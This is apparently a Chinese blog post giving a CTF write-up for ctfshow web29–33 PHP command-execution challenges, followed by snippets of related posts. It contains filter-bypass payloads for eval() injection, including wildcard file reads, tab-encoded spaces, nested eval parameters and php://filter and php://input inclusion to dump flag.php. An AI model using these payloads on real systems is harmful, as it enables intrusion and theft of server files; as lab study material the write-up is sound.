web-命令执行

原创 已于 2023-04-30 17:41:12 修改 · 390 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #c++ #html

于 2023-04-30 17:36:12 首次发布
文章讲述了在Web应用程序中如何通过各种方法绕过过滤机制执行命令,包括使用通配符、嵌套函数、URL编码以及利用伪协议来执行系统命令,如`eval()`、`system()`等。

web29

system执行;通配符

题目:命令执行,需要严格的过滤
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 这里对flag进行过滤,用通配符?flag绕过可以用 f*

以下参考

一
?c=system('cat fla?.php');

?c=system('cat fla*');

二
?c=system("cp fla?.php 1.txt");

?c=system('cp fla?.php 1.txt');

/?c=system(‘ls’); 

然后访问1.txt 就ok了 

web30

system过滤了?

 if(!preg_match("/flag|system|php/i", $c)){

 /?c=echo%20exec("ls"); 其实这里和上面%20在编码当中是空格的意思,因此保持习惯加了  %20,不加效果一样,看实际情况

echo exec("ls"); 是一个 PHP 命令执行代码,它会在服务器上执行 ls 命令

具体来说,exec() PHP 中用于执行系统命令的函数,它可以在参数中指定要执行的命令,而 echo 则将 exec() 函数返回的命令输出到页面上。因此,该代码相当于执行了ls,也就是达到了29题的效果。

 

Web31

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){

eval() JavaScript 中的一个全局函数,其作用是将字符串作为脚本代码执行,并返回最后一个表达式的结果。 eval() 可以执行任何字符串作为 JavaScript 代码

 又多了一些过滤,改怎末绕过呢

多了空格 cat  /?c=echo%20exec("ls");”改怎末替换呢

第一种

%09换成空格 nl代替cat

URL编码中,%09 是水平制表符 Tab)的编码表示方式,因此在 Web 地址(URL)中将 %09 用作参数分隔符的效果等同于使用空格。此外,还有其他常见的URL编码字符,例如 %20 表示空格,%2F 表示斜杠 / 等。 

第二种

嵌套eval,逃逸参数

 比如这里访问phpinfo()  url/?c=eval($_GET[ikun]);&ikun=phpinfo();

 那我们换了执行命令不就可以了吗

 url/?c=eval($_GET[ikun]);&ikun=system(‘ls’);

 第三种

 伪协议: url/?c=include%09$_GET[k];&k=php://filter/convert.base64-encode/resource=flag.php

然后在解base就行了 

Web32 

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){

 过滤了     flag\system\php\cat\sort\shell\小数点\空格\单引号\波浪号\echo\分号\括号

;可以用?> 空格也被过滤了,就用%0a,表示换行,相当于enter 

php://filter

/?c=include%09$_GET[k]?>&k=php://filter/read=convert.base64-encode/resource=flag.php 

 php://input

 ?c=include"$_GET[1]"?>&1=php://input

然后<?php system(‘cat flag.php’)?> 

 Web33

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){

双引号也过滤了,那32也没用双引号啊,同解 32  

/?c=include%09$_GET[k]?>&k=php://filter/read=convert.base64-encode/resource=flag.php

Web入门---命令执行
s849602863的博客
05-21 1494
ctfshow-Web入门---命令执行
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 1109
ctfshow,命令执行web31
web渗透命令执行,代码执行
最新发布
2401_84445424的博客
07-02 1575
代码注入原理:网站对用户的输入过滤出现问题,同时网站的脚本编写用到一些危险函数eval(),assert()。如果被攻击者发现漏洞,直接可能造成攻击者完全控制整个web甚至是服务器。相当于web后门的存在。 命令注入 Command Injection:脚本语言开发网站功能十分迅速,但是,如果我们需要用到一些其他语言编写的程序呢,把结果返回给用户。那就会用系统的一些命令去执行其他语言编写的程序。只要涉及到了这些,那么很可能就会存在用户输入没有过滤而导致命令执行漏洞。
ctfshow之web入门-命令执行(1)web29-38
weixin_47726676的博客
04-22 375
题目来自CTFshow-web入门-命令执行 web29 安装hackbar 启动环境,看到正则表达式过滤掉flag error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 点击F12开启hackbar窗口,使用?c=phpinf
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1787
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行。
WEB安全基础 - - -命令执行漏洞
weixin_67503304的博客
07-28 1868
简要介绍命令执行漏洞的原理,总结了常用的PHP代码执行函数。
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2784
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
ctfshow-web入门-命令执行(web32-36)
HkD01L的博客
06-25 1285
ctfshow,web入门,命令执行,web32,web33,web34,web35,web36
CTFshow-WEB入门-命令执行
热门推荐
feng的博客
01-20 1万+
web29 ?c=system("cat fla*.php"); 或者 连蚁剑得flag。 web30 或者其他姿势,因为过滤太少,命令执行得函数很多,绕过姿势也很多,因此不列举了。 web31 或者 ?c=echo`tac%09fl*`; web32 利用自己以前没有注意过得一个点。 if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ 过滤了括号和分号确实有些难受。过滤了括号只能用无括号的
web基础漏洞之命令执行漏洞
m0_62274649的博客
10-04 1256
一些命令执行漏洞的总结,各种bypass掌握的还不好,继续更新
ctfhsow web入门 命令执行大全
wangringyi的博客
09-25 3056
全网最全命令执行方法
web命令执行漏洞
weixin_33713707的博客
11-12 382
一,什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 二,利用条件: 1,应用调用执行命令的函数 2,...
命令执行漏洞
weixin_45007073的博客
01-26 673
利用原理 命令注入是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用程序将不安全的用户提供的数据(表单,Cookie,HTTP头等)传递给系统shell时,命令注入攻击是可能的。在这种攻击中,攻击者提供的操作系统命令通常以易受攻击的应用程序的特权执行。命令注入攻击可能很大程度上是由于输入验证不足。 命令执行和代码执行漏洞的区别 代码执行漏洞执行的效果完全受限于语言本身,而命令执行漏洞执行的效果不受限于语言语法本身,不受命令本身限制。 命令执行的类型 代码层过滤不严 系统的漏洞造
Web命令执行
weixin_45906533的博客
07-07 372
从上面的blacklist里面,可以得知,cat,空格,flag,“.” 都被过滤了。像这种替换操作,如果是字符串我们正常可以双写绕过,我们先看看可以执行哪些命令。命令执行成功,那么我们使用ls看看当前目录下有什么文件,注意。根据上面的分析我们可以得知,如果想要执行命令,我们需要绕过。了,那么接下来肯定是需要查看它里面的文件内容了。常规查看命令:cat flag.php。结尾的,但是被禁了,所以我们可以用。里面,所以要双写绕过一下。
Web漏洞-命令执行和代码执行漏洞
Ays.Ie的博客
03-13 2164
该篇描述了web漏洞-命令执行和代码执行漏洞
命令执行web入门
2201_75316477的博客
12-30 2486
我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。如果对取反不了解可以百度一下,这里给个容易记得式子,如果对a按位取反,则得到的结果为-(a+1),也就是对0取反得到-1。其中%09,%26不受数字被过滤的影响,因为在加载时%09,%26会被解码为空格和分号,也就没有了数字。过滤了冒号,不能用伪协议了,没有过滤英文状态的**()** 和**;这下好了,过滤了字母,但是数字没有过滤,数字?
2021-10-01
clearloveQAQ的博客
10-17 3127
命令执行: eval类 1.过滤flag: (1)用通配符绕过?c=system('cat f*'); (2)复制:system("cp fla*.php 1.txt") 执行文件:1.txt 2.过滤flag,php,system(对命令执行函数进行过滤) 命令执行函数 因为system被过滤这里可用反引号绕过 ?c=echo `cat f*`; ?c=eval($_GET[1]);&1=system('cat flag.php'); 3.过滤flag...
web安全-命令执行
qq_59350385的博客
02-23 3413
一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。 二、漏洞成因 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令中执行,在没有过滤的情况下就会造成命令执行漏洞。 三、相关函数 system(args)有回显 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值